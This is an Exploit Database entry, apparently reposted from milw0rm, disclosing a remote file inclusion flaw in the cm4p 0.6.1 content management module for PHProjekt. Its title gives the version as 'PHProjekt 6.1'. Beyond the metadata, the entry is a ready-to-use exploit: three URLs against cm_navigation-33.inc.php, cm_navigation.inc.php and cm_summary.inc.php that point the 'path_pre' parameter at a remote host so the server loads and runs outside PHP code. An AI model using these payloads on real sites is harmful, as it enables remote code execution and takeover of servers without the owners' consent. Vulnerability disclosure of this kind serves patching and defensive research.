PHProjekt 6.1 - 'path_pre' Multiple Remote File Inclusions

Author: the master
type: webapps
platform: php
port: 
date_added: 2006-08-20 
date_updated: 2016-09-09 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comcm4p_0.6.1.tar.gz

########################################################################
#  Content management module for PHProjekt v0.6.1  Remote File Inclusion Vulnerability
#
#  Download: http://www.mariovaldez.net/software/cm_4p/files/cm4p_0.6.1.tar.gz
#
#  Found By: the master
#
########################################################################
#  exploit:
#
#  http://[Target]/[Path]/cm_navigation-33.inc.php?path_pre=http://cmd.gif?
#  http://[Target]/[Path]/cm_navigation.inc.php?path_pre=http://cmd.gif?
#  http://[Target]/[Path]/cm_summary.inc.php?path_pre=http://cmd.gif?
########################################################################

# milw0rm.com [2006-08-21]